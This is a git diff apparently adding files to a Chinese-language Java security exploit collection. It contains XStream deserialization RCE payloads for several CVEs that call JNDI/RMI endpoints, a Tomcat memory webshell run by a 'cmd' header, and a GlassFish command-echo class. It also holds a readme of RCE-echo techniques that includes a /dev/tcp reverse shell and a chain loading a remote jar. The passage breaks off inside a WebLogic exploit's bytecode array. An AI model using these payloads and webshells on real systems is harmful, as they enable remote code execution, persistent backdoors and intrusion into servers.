+ false
+ false
+
+
+
+
+
+ false
+ false
+
+
+
+
+ 1008
+ true
+ 1000
+ 0
+ 2
+ 0
+ 0
+ 0
+ true
+ 1004
+ false
+ {rmi}
+
+
+
+
+
+
+
+
+
+ com.sun.rowset.JdbcRowSetImpl
+ setAutoCommit
+
+ boolean
+
+
+
+ false
+
+
+ false
+
+ false
+
+ -1
+ false
+ false
+
+ 1
+
+ 1
+ false
+
+
+
+ ysomap
+
+ test
+
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-29505.xml b/Xstream/exp/RCE/CVE-2021-29505.xml
new file mode 100644
index 0000000..2ba3040
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-29505.xml
@@ -0,0 +1,55 @@
+
+
+
+
+ 2
+
+ 3
+
+ 12345
+
+ com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content
+
+
+
+ 12345
+
+
+ true
+ SOAP_11
+
+
+ false
+
+
+
+
+ aa
+ aa
+
+
+
+
+
+ UnicastRef
+ 1.116.136.120
+ 2333
+ 0
+ 0
+ 0
+ 0
+ false
+
+
+ 1.116.136.120
+ 2333
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-39141.xml b/Xstream/exp/RCE/CVE-2021-39141.xml
new file mode 100644
index 0000000..65432a3
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-39141.xml
@@ -0,0 +1,172 @@
+
+
+
+
+ 2
+
+ 3
+
+ java.lang.Comparable
+
+
+ false
+
+
+
+
+ java.lang.Comparable
+ compareTo
+
+ java.lang.Object
+
+
+
+
+
+ 0
+
+
+ PLAIN
+
+
+
+ false
+
+ int
+
+ hash
+ java.lang.String
+
+
+ false
+
+
+ hash
+
+
+
+ java.lang.String
+
+ javax.naming.InitialContext
+ doLookup
+
+ java.lang.String
+
+
+
+
+
+
+ serialPersistentFields
+
+ [Ljava.io.ObjectStreamField;
+
+ serialPersistentFields
+ java.lang.String
+
+
+
+
+ CASE_INSENSITIVE_ORDER
+
+ java.util.Comparator
+
+ CASE_INSENSITIVE_ORDER
+ java.lang.String
+
+
+
+
+ serialVersionUID
+
+ long
+
+ serialVersionUID
+ java.lang.String
+
+
+
+
+ value
+
+ [C
+
+ value
+ java.lang.String
+
+
+
+
+ hash
+
+ int
+
+
+
+
+
+
+ serialPersistentFields
+
+ [Ljava.io.ObjectStreamField;
+
+
+
+
+ CASE_INSENSITIVE_ORDER
+
+ java.util.Comparator
+
+
+
+
+ serialVersionUID
+
+ long
+
+
+
+
+ value
+
+ [C
+
+
+
+
+ hash
+
+
+
+ false
+ java.lang.String
+
+
+
+
+ java.lang.Object
+
+ false
+
+ false
+
+
+
+ false
+
+
+
+
+
+
+
+ false
+ false
+
+
+
+
+
+ ldap://127.0.0.1:15000/#evil
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-39144.xml b/Xstream/exp/RCE/CVE-2021-39144.xml
new file mode 100644
index 0000000..b71988b
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-39144.xml
@@ -0,0 +1,38 @@
+
+
+
+
+ 2
+
+ 3
+
+ java.lang.Comparable
+
+ true
+ java.lang.Comparable
+
+
+
+ java.lang.Comparable
+ compareTo
+
+ java.lang.Object
+
+
+
+
+
+ java.lang.Runtime
+ exec
+
+ java.lang.String
+
+
+
+
+
+
+
+ calc
+
+
\ No newline at end of file
diff --git a/Xstream/exp/RCE/CVE-2021-39146.xml b/Xstream/exp/RCE/CVE-2021-39146.xml
new file mode 100644
index 0000000..dbc66e1
--- /dev/null
+++ b/Xstream/exp/RCE/CVE-2021-39146.xml
@@ -0,0 +1,59 @@
+
+
+ test
+
+
+
+
+ 0.75
+ 525
+
+ 700
+ 0
+
+
+
+ zh_CN
+
+
+
+
+
+
+
+
+
+
+ 0.75
+ 525
+
+ 700
+ 1
+ lazyValue
+
+ javax.naming.InitialContext
+ doLookup
+
+ ldap://127.0.0.1:15000/#evil
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ test
+
+ test
+
+
+
\ No newline at end of file
diff --git a/Xstream/exp/XXE/CVE-2016-3674.xml b/Xstream/exp/XXE/CVE-2016-3674.xml
new file mode 100644
index 0000000..148ca8c
--- /dev/null
+++ b/Xstream/exp/XXE/CVE-2016-3674.xml
@@ -0,0 +1 @@
+no find..
\ No newline at end of file
diff --git a/apache storm/Readme.md b/apache storm/Readme.md
new file mode 100644
index 0000000..c269064
--- /dev/null
+++ b/apache storm/Readme.md
@@ -0,0 +1,21 @@
+# apache storm
+
+## 环境搭建
+
+https://blog.51cto.com/u_13870740/3445168
+
+https://github.com/heibaiying/BigData-Notes/blob/master/notes/installation/Storm%E5%8D%95%E6%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA.md
+
+```
+nohup bash storm dev-zookeeper & bash storm nimbus & bash storm supervisor &bash storm ui & bash storm logviewer &
+```
+
+## 漏洞分析
+
+https://paper.seebug.org/1780/#0x03
+
+https://blog.noah.360.net/apache-storm-vulnerability-analysis/
+
+https://y4er.com/posts/apache-storm-two-cve/
+
+**自己尝试反序列化并没有成功cb,环境是2.1.0**
diff --git a/hadoop/Readme.md b/hadoop/Readme.md
new file mode 100644
index 0000000..7e168b6
--- /dev/null
+++ b/hadoop/Readme.md
@@ -0,0 +1,21 @@
+# Hadoop
+
+[【安全风险通告】Apache Hadoop Yarn RPC未授权访问漏洞安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247495027&idx=1&sn=5758a6717309a55e09f184e5bae82c75&chksm=fe79c9ebc90e40fd6d0c3f0bd21ce92f53b4f58aa0ee07d0c005ca85a28d2cfd70f61c40fae7&mpshare=1&scene=23&srcid=1123jW67UF5RY5e5aOeDZ5ha&sharer_sharetime=1637638003307&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd)
+
+[Hadoop Yarn RPC RCE 复现](https://mp.weixin.qq.com/s/lVl5HnVuZyLTIeSrbw1cuA)
+
+[Hadoop Yarn RPC未授权RCE(含一键利用工具)](https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485150&idx=1&sn=c31937fdb3e92ae3951a98b7967032b2&chksm=c0888394f7ff0a8224a8984f2cb4935f9aa1e7d243c4b512c488600d8fef0b6ec16a2b345865&token=616099468&lang=zh_CN#rd)
+
+[Hadoop Yarn RPC未授权访问漏洞复现](https://zgao.top/hadoop-yarn-rpc%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/)
+
+[GHSL-2022-012: Arbitrary file write during TAR extraction in Apache Hadoop - CVE-2022-26612](https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/)
+
+## 环境搭建
+
+org.apache.hadoop.yarn.util.resource.ResourceUtils
+
+```
+docker pull kpli0rn/hadoop-rpc-vuln:3.3.0
+docker run -d --name yarn -p 8042:8042 -p 8032:8032 kpli0rn/hadoop-rpc-vuln:3.3.0
+```
+
diff --git a/image.png b/image.png
new file mode 100644
index 0000000..2fb9c15
Binary files /dev/null and b/image.png differ
diff --git a/jackson/Readme.md b/jackson/Readme.md
new file mode 100644
index 0000000..2f9d12f
--- /dev/null
+++ b/jackson/Readme.md
@@ -0,0 +1,36 @@
+# jackson
+
+http://www.lmxspace.com/2019/07/30/Jackson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B1%87%E6%80%BB/
+
+https://www.i4k.xyz/article/caiqiiqi/105193411
+
+https://github.com/cowtowncoder/jackson-compat-minor/
+
+## 不出网利用
+1.TemplatesImpl
+
+http://www.lmxspace.com/2019/07/30/Jackson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%B1%87%E6%80%BB/#TemplatesImpl
+
+2.c3p0
+
+http://redteam.today/2020/04/18/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget/
+
+## 验证存在jackson漏洞
+
+```java
+ObjectMapper objectMapper = new ObjectMapper();
+objectMapper.enableDefaultTyping();
+/**
+objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_FINAL);
+objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.JAVA_LANG_OBJECT);
+objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.OBJECT_AND_NON_CONCRETE);
+objectMapper.enableDefaultTyping(ObjectMapper.DefaultTyping.NON_CONCRETE_AND_ARRAYS);
+*/
+String jsonResult = "[\"java.util.HashSet\",[[\"java.net.URL\",\"http://1wc3gw.dnslog.cn\"]]]";
+objectMapper.readValue(jsonResult,Object.class);
+```
+其他exp
+```java
+["java.net.InetSocketAddress","nqigwr.dnslog.cn"]
+["java.net.InetAddress","ap6d50.dnslog.cn"]
+```
diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md"
index 18e7930..4859d8a 100644
--- "a/java\345\206\205\345\255\230\351\251\254/Readme.md"
+++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md"
@@ -1 +1,27 @@
# java内存马
+
++ [Java Web中的Servlet+Filter+Listener注册方式](https://www.jianshu.com/p/cbe1c3174d41)
++ [awd shiro内存木马注入](https://github.com/KpLi0rn/ShiroVulnEnv)
++ [基于tomcat的内存 Webshell 无文件攻击技术](https://xz.aliyun.com/t/7388)
++ [JavaWeb 内存马一周目通关攻略](https://su18.org/post/memory-shell/)
++ [JavaWeb 内存马二周目通关攻略](https://su18.org/post/memory-shell-2/)
++ [【原创】利用“进程注入”实现无文件不死webshell](https://www.cnblogs.com/rebeyond/p/9686213.html)
+
+## springboot
++ [利用 intercetor 注入 spring 内存 webshell](https://landgrey.me/blog/19/)
+
+## spring
++ [基于内存 Webshell 的无文件攻击技术研究](https://landgrey.me/blog/12/)
++ [前尘——内存中无处可寻的木马](https://www.anquanke.com/post/id/253475)
+
+## 后门
++ [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/)
++ [JavaWeb 内存马二周目通关攻略](https://tttang.com/archive/1313)
+
+## jsp
++ [](https://xz.aliyun.com/t/10372)
+
+## 查杀
++ [查杀Java web filter型内存马](https://gv7.me/articles/2020/kill-java-web-filter-memshell/)
++ [Filter/Servlet型内存马的扫描抓捕与查杀](https://gv7.me/articles/2020/filter-servlet-type-memshell-scan-capture-and-kill/)
++ [基于javaAgent内存马检测查杀指南](https://mp.weixin.qq.com/s/Whta6akjaZamc3nOY1Tvxg#at)
diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
new file mode 100644
index 0000000..596af80
--- /dev/null
+++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md"
@@ -0,0 +1,99 @@
+# Upgrade
+
+参考:https://tttang.com/archive/1709
+
+```java
+package com.example.demo;
+
+
+import org.apache.catalina.connector.Connector;
+import org.apache.catalina.connector.Request;
+import org.apache.catalina.connector.RequestFacade;
+import org.apache.coyote.Adapter;
+import org.apache.coyote.Processor;
+import org.apache.coyote.Response;
+import org.apache.coyote.UpgradeProtocol;
+import org.apache.coyote.http11.AbstractHttp11Protocol;
+import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler;
+import org.apache.tomcat.util.net.SocketWrapperBase;
+import org.springframework.web.context.request.RequestContextHolder;
+import org.springframework.web.context.request.ServletRequestAttributes;
+
+import javax.servlet.http.HttpServletRequest;
+import java.lang.reflect.Field;
+import java.nio.ByteBuffer;
+import java.util.HashMap;
+
+public class UpgradeMemShell implements UpgradeProtocol {
+
+ public UpgradeMemShell() throws Exception{
+ HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();
+ RequestFacade rf = (RequestFacade) request;
+ Field requestField = RequestFacade.class.getDeclaredField("request");
+ requestField.setAccessible(true);
+ Request request1 = (Request) requestField.get(rf);
+
+ Field connector = Request.class.getDeclaredField("connector");
+ connector.setAccessible(true);
+ Connector realConnector = (Connector) connector.get(request1);
+
+ Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler");
+ protocolHandlerField.setAccessible(true);
+ AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector);
+
+ HashMap upgradeProtocols = null;
+ Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols");
+ upgradeProtocolsField.setAccessible(true);
+ upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler);
+ upgradeProtocols.put("http2.0", this);
+ upgradeProtocolsField.set(handler, upgradeProtocols);
+ System.out.println("success");
+ }
+
+ @Override
+ public String getHttpUpgradeName(boolean b) {
+ return null;
+ }
+
+ @Override
+ public byte[] getAlpnIdentifier() {
+ return new byte[0];
+ }
+
+ @Override
+ public String getAlpnName() {
+ return null;
+ }
+
+ @Override
+ public Processor getProcessor(SocketWrapperBase> socketWrapperBase, Adapter adapter) {
+ return null;
+ }
+
+ @Override
+ public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) {
+ return null;
+ }
+
+ public boolean accept(org.apache.coyote.Request request) {
+ System.out.println("MyUpgrade.accept");
+ String p = request.getHeader("cmd");
+ try {
+ String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p};
+ Field response = org.apache.coyote.Request.class.getDeclaredField("response");
+ response.setAccessible(true);
+ Response resp = (Response) response.get(request);
+ byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes();
+ resp.doWrite(ByteBuffer.wrap(result));
+ } catch (Exception e){}
+ return false;
+ }
+}
+```
+
+使用
+```txt
+Upgrade: http2.o
+cmd: calc
+Connection: Upgrade
+```
diff --git "a/java\345\233\236\346\230\276/GlassFish/Echo_Request.java" "b/java\345\233\236\346\230\276/GlassFish/Echo_Request.java"
new file mode 100644
index 0000000..cda1642
--- /dev/null
+++ "b/java\345\233\236\346\230\276/GlassFish/Echo_Request.java"
@@ -0,0 +1,81 @@
+package com.firebasky.exp;
+
+/**
+ * TargetObject = {org.glassfish.grizzly.threadpool.DefaultWorkerThread}
+ * ---> group = {java.lang.ThreadGroup}
+ * ---> threads = {class [Ljava.lang.Thread;}
+ * ---> [17] = {org.glassfish.grizzly.threadpool.DefaultWorkerThread}
+ * ---> objectCache = {org.glassfish.grizzly.ThreadCache$ObjectCache}
+ * ---> objectCacheElements = {class [Lorg.glassfish.grizzly.ThreadCache$ObjectCacheElement;}
+ * ---> [3] = {org.glassfish.grizzly.ThreadCache$ObjectCacheElement}
+ * ---> cache = {class [Ljava.lang.Object;}
+ * ---> [0] = {org.glassfish.grizzly.http.server.Request}
+ */
+
+
+/**
+ * GlassFish 回显 有问题获得的res为null,等待完善
+ */
+public class Echo_Request {
+ static {
+ try {
+ getResponse();
+ Runtime.getRuntime().exec("calc");
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+ }
+ public static void getResponse() throws Exception {
+ Thread thread = Thread.currentThread();
+ java.lang.reflect.Field threadLocals = Thread.class.getDeclaredField("group");
+ threadLocals.setAccessible(true);
+ Object threadLocalMap = threadLocals.get(thread);
+
+ Class threadLocalMapClazz = Class.forName("java.lang.ThreadGroup");
+ java.lang.reflect.Field tableField = threadLocalMapClazz.getDeclaredField("threads");
+ tableField.setAccessible(true);
+ Object[] objects = (Object[]) tableField.get(threadLocalMap);
+
+ Class entryClass = Class.forName("org.glassfish.grizzly.threadpool.DefaultWorkerThread");
+ java.lang.reflect.Field entryValueField = entryClass.getDeclaredField("objectCache");
+ entryValueField.setAccessible(true);
+
+ for (Object object : objects) {
+ if (object != null) {
+ Object valueObject = entryValueField.get(object);
+ if (valueObject != null) {
+ if (valueObject.getClass().getName().equals("org.glassfish.grizzly.ThreadCache$ObjectCache")) {
+ java.lang.reflect.Field objectCacheElements = valueObject.getClass().getDeclaredField("objectCacheElements");
+ objectCacheElements.setAccessible(true);
+ Object[] objects1 = (Object[]) objectCacheElements.get(valueObject);
+
+ Class> aClass = Class.forName("org.glassfish.grizzly.ThreadCache$ObjectCacheElement");
+ java.lang.reflect.Field cache = aClass.getDeclaredField("cache");
+ cache.setAccessible(true);
+
+ for (Object o : objects1) {
+ if (o != null) {
+ Object[] objects2 = (Object[]) cache.get(o);
+ for (Object o1 : objects2) {
+ if(o1.getClass().getName().equals("org.glassfish.grizzly.http.server.Request")){
+ //response
+ org.glassfish.grizzly.http.server.Response getResponse = (org.glassfish.grizzly.http.server.Response) o1.getClass().getMethod("getResponse").invoke(o1);
+ //request
+ org.glassfish.grizzly.http.server.Request getRequest = (org.glassfish.grizzly.http.server.Request) o1.getClass().getMethod("getRequest").invoke(o1);
+ String cmd1 = getRequest.getHeader("cmd");
+ String[] cmd = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd1} : new String[]{"cmd.exe", "/c",cmd1};
+ java.io.InputStream in = Runtime.getRuntime().exec(cmd).getInputStream();
+ java.util.Scanner s = new java.util.Scanner(in).useDelimiter("\\a");
+ String output = s.hasNext() ? s.next() : "";
+ getResponse.getWriter().write(output);
+ getResponse.getWriter().write("by Firebasky");
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+}
diff --git "a/java\345\233\236\346\230\276/HELP.md" "b/java\345\233\236\346\230\276/HELP.md"
new file mode 100644
index 0000000..f10aa2d
--- /dev/null
+++ "b/java\345\233\236\346\230\276/HELP.md"
@@ -0,0 +1,19 @@
+# Getting Started
+
+### Reference Documentation
+
+For further reference, please consider the following sections:
+
+* [Official Apache Maven documentation](https://maven.apache.org/guides/index.html)
+* [Spring Boot Maven Plugin Reference Guide](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/)
+* [Create an OCI image](https://docs.spring.io/spring-boot/docs/2.5.5/maven-plugin/reference/html/#build-image)
+* [Spring Web](https://docs.spring.io/spring-boot/docs/2.5.5/reference/htmlsingle/#boot-features-developing-web-applications)
+
+### Guides
+
+The following guides illustrate how to use some features concretely:
+
+* [Building a RESTful Web Service](https://spring.io/guides/gs/rest-service/)
+* [Serving Web Content with Spring MVC](https://spring.io/guides/gs/serving-web-content/)
+* [Building REST services with Spring](https://spring.io/guides/tutorials/bookmarks/)
+
diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md"
new file mode 100644
index 0000000..6b74f01
--- /dev/null
+++ "b/java\345\233\236\346\230\276/Readme.md"
@@ -0,0 +1,352 @@
+# java回显
+
+**2022/5/2更新,发现fnmsd师傅弄跟dsf的回显感觉很np**
+```
+https://blog.csdn.net/fnmsd/article/details/106709736
+https://blog.csdn.net/fnmsd/article/details/106890242
+```
+
+发现个好项目 https://github.com/feihong-cs/Java-Rce-Echo
+
+>一般web服务是想办法获得response对象,可以参考[2021RCTF ezshell](https://github.com/Firebasky/ctf-Challenge/tree/main/RCTF-2021-EZshell)
+
+### 异常回显
+
+我们将命令执行的结果给Exception(result),因为Exception可以传递string,在抛出异常throw e;之后在命令执行的过程中如果目标的代码逻辑存在过程中错误抛出异常就可以看到回显内容
+
+```java
+import java.io.BufferedReader;
+import java.io.InputStreamReader;
+public class RunCheckConfig {
+public RunCheckConfig(String args) throws Exception
+{
+Process proc = Runtime.getRuntime().exec(args);
+BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
+StringBuffer sb = new StringBuffer();
+String line;
+while ((line = br.readLine()) != null)
+{
+sb.append(line).append("\n");
+}
+String result = sb.toString();
+Exception e=new Exception(result);
+throw e;
+}
+}
+```
+**目前暂时没有找到真实的demo.....**
+
+### URLClassLoader抛出异常
+
+```java
+package exploit.firebasky;
+
+import java.io.BufferedInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+
+public class ErrorBaseExec
+{
+ public ErrorBaseExec(String cmd) throws Exception{
+ do_exec(cmd);
+ }
+
+ public static byte[] readBytes(InputStream in)
+ throws IOException
+ {
+ BufferedInputStream bufin = new BufferedInputStream(in);
+ int buffSize = 1024;
+ ByteArrayOutputStream out = new ByteArrayOutputStream(buffSize);
+ byte[] temp = new byte[buffSize];
+ int size = 0;
+ while ((size = bufin.read(temp)) != -1) {
+ out.write(temp, 0, size);
+ }
+ bufin.close();
+
+ byte[] content = out.toByteArray();
+
+ return content;
+ }
+
+ public static void do_exec(String cmd)
+ throws Exception
+ {
+ Process p = Runtime.getRuntime().exec(cmd);
+ byte[] stderr = readBytes(p.getErrorStream());
+ byte[] stdout = readBytes(p.getInputStream());
+ int exitValue = p.waitFor();
+ if (exitValue == 0) {
+ throw new Exception("-----------------\r\n" + new String(stdout) + "-----------------\r\n");
+ }
+ throw new Exception("-----------------\r\n" + new String(stderr) + "-----------------\r\n");
+ }
+
+ public static void main(String[] args)
+ throws Exception
+ {
+ do_exec(args[0]);
+ }
+}
+```
+编译成jar之后可以封装到cc利用链组件中
+```java
+public static Transformer[] EchoCC() throws Exception {
+ Transformer[] transformers = new Transformer[]{
+ new ConstantTransformer(URLClassLoader.class),
+ new InvokerTransformer("getConstructor",
+ new Class[]{Class[].class},
+ new Object[]{new Class[]{URL[].class}}),
+ new InvokerTransformer("newInstance",
+ new Class[]{Object[].class},
+ new Object[]{new Object[]{new URL[]{new URL("http://127.0.0.1:8099/ErrorBaseExec.jar")}}}),
+ new InvokerTransformer("loadClass",
+ new Class[]{String.class},
+ new Object[]{"exploit.firebasky.ErrorBaseExec"}),
+ new InvokerTransformer("getConstructor",
+ new Class[]{Class[].class},
+ new Object[]{new Class[]{String.class}}),
+ new InvokerTransformer("newInstance",
+ new Class[]{Object[].class},
+ new Object[]{new String[]{"ipconfig"}})
+ };
+ return transformers;
+ }
+```
+### defineClass
+其实就是通过ClassLoader去执行(反射)我们自定义类的字节码。
+
+```java
+public static String FiletoBytes(String filename) throws Exception{
+ String buf = null;
+ File file = new File(filename);
+ FileInputStream fis = null;
+ try {
+ fis = new FileInputStream(file);
+ int size = fis.available();
+ byte[] bytes = new byte[size];
+ fis.read(bytes);
+ buf = Arrays.toString(bytes);
+ fis.close();
+ return buf;
+ } catch (FileNotFoundException e) {
+ e.printStackTrace();
+ } catch (IOException e) {
+ e.printStackTrace();
+ }
+ return buf;
+ }
+
+@Override
+ protected Class> findClass(String name) throws ClassNotFoundException {
+ if (name == myClassName) {
+ System.out.println("加载" + name + "类");
+ return defineClass(myClassName, bs, 0, bs.length);
+ }
+ return super.findClass(name);
+ }
+```
+
+### 中间件回显
+由于没有是研究tomcat等容器的回显。能力有限。
+
+
+>中间件而言多数重写了thread类,在thread中保存了req和resp,可以通过获取当前线程,在resp中写入回显结果
+
+
+
+参考:https://l3yx.github.io/2020/03/31/Java-Web%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E5%9B%9E%E6%98%BE%E6%80%BB%E7%BB%93/
+
+直接用项目的代码。
+
+在利用tempimpl创建类的时候可以使用如下代码
+```java
+import com.sun.org.apache.xalan.internal.xsltc.DOM;
+import com.sun.org.apache.xalan.internal.xsltc.TransletException;
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
+import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
+import java.io.IOException;
+
+public class evilclass extends AbstractTranslet {
+ static {
+ try{
+ Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/ip/port;cat <&5 | while read line; do $line 2>&5 >&5; done"});
+ }catch (IOException e){
+ try{
+ Runtime.getRuntime().exec(new String[]{"cmd", "/c", "calc"});
+ }catch (IOException ee){
+ }
+ }
+ }
+ @Override
+ public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
+
+ }
+
+ @Override
+ public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
+
+ }
+}
+```
+
+### RMI绑定实例
+通过加载执行代码,相当于创建了一个server的rmi实现了定义接口的方法返回是返回执行命令的结果,然后客户端去调用创建的rmi的接口方法,获得返回值。
+
+可以参考weblogic回显通过rmi.
+```java
+
+package com.test;
+
+import com.supeream.serial.Reflections;
+import com.supeream.serial.SerialDataGenerator;
+import com.supeream.serial.Serializables;
+import com.supeream.ssl.WeblogicTrustManager;
+import com.supeream.weblogic.T3ProtocolOperation;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.map.LazyMap;
+import org.mozilla.classfile.DefiningClassLoader;
+import weblogic.cluster.singleton.ClusterMasterRemote;
+import weblogic.corba.utils.MarshalledObject;
+import weblogic.jndi.Environment;
+
+import javax.naming.Context;
+import java.io.ByteArrayOutputStream;
+import java.io.ObjectOutputStream;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+import java.util.HashMap;
+import java.util.HashSet;
+import java.util.Map;
+
+public class Main {
+ private static String host = "172.16.2.129";
+ private static String port = "7001";
+ private static final String classname = "com.test.payload.RemoteImpl";
+ private static final byte[] bs = new byte[]{
+ -54, -2, -70, -66, 0, 0, 0, 50, 0, -116, 10, 0, 32, 0, 83, 7, 0, 84, 10, 0, 2, 0, 83, 7, 0, 85, 10, 0, 4, 0, 83, 8, 0, 86, 11, 0, 87, 0, 88, 10, 0, 2, 0, 89, 7, 0, 90, 10, 0, 9, 0, 91, 7, 0, 92, 10, 0, 11, 0, 83, 8, 0, 93, 11, 0, 94, 0, 95, 8, 0, 96, 7, 0, 97, 10, 0, 16, 0, 98, 10, 0, 16, 0, 99, 10, 0, 16, 0, 100, 7, 0, 101, 7, 0, 102, 10, 0, 103, 0, 104, 10, 0, 21, 0, 105, 10, 0, 20, 0, 106, 7, 0, 107, 10, 0, 25, 0, 83, 10, 0, 20, 0, 108, 10, 0, 25, 0, 109, 8, 0, 110, 10, 0, 25, 0, 111, 10, 0, 9, 0, 112, 7, 0, 113, 7, 0, 114, 1, 0, 6, 60, 105, 110, 105, 116, 62, 1, 0, 3, 40, 41, 86, 1, 0, 4, 67, 111, 100, 101, 1, 0, 15, 76, 105, 110, 101, 78, 117, 109, 98, 101, 114, 84, 97, 98, 108, 101, 1, 0, 18, 76, 111, 99, 97, 108, 86, 97, 114, 105, 97, 98, 108, 101, 84, 97, 98, 108, 101, 1, 0, 4, 116, 104, 105, 115, 1, 0, 29, 76, 99, 111, 109, 47, 116, 101, 115, 116, 47, 112, 97, 121, 108, 111, 97, 100, 47, 82, 101, 109, 111, 116, 101, 73, 109, 112, 108, 59, 1, 0, 4, 109, 97, 105, 110, 1, 0, 22, 40, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 7, 99, 111, 110, 116, 101, 120, 116, 1, 0, 22, 76, 106, 97, 118, 97, 120, 47, 110, 97, 109, 105, 110, 103, 47, 67, 111, 110, 116, 101, 120, 116, 59, 1, 0, 1, 101, 1, 0, 21, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 69, 120, 99, 101, 112, 116, 105, 111, 110, 59, 1, 0, 4, 97, 114, 103, 115, 1, 0, 19, 91, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 6, 114, 101, 109, 111, 116, 101, 1, 0, 13, 83, 116, 97, 99, 107, 77, 97, 112, 84, 97, 98, 108, 101, 7, 0, 48, 7, 0, 84, 7, 0, 90, 1, 0, 17, 115, 101, 116, 83, 101, 114, 118, 101, 114, 76, 111, 99, 97, 116, 105, 111, 110, 1, 0, 39, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 86, 1, 0, 3, 99, 109, 100, 1, 0, 18, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 
116, 114, 105, 110, 103, 59, 1, 0, 10, 69, 120, 99, 101, 112, 116, 105, 111, 110, 115, 7, 0, 115, 1, 0, 17, 103, 101, 116, 83, 101, 114, 118, 101, 114, 76, 111, 99, 97, 116, 105, 111, 110, 1, 0, 38, 40, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 41, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 83, 116, 114, 105, 110, 103, 59, 1, 0, 4, 99, 109, 100, 115, 1, 0, 16, 76, 106, 97, 118, 97, 47, 117, 116, 105, 108, 47, 76, 105, 115, 116, 59, 1, 0, 14, 112, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 1, 0, 26, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 66, 117, 105, 108, 100, 101, 114, 59, 1, 0, 4, 112, 114, 111, 99, 1, 0, 19, 76, 106, 97, 118, 97, 47, 108, 97, 110, 103, 47, 80, 114, 111, 99, 101, 115, 115, 59, 1, 0, 2, 98, 114, 1, 0, 24, 76, 106, 97, 118, 97, 47, 105, 111, 47, 66, 117, 102, 102, 101, 114, 101, 100, 82, 101, 97, 100, 101, 114, 59, 1, 0, 2, 115, 98, 1, 0, 24, 76, 106, 97, 118, 97, 47, 108, 97, 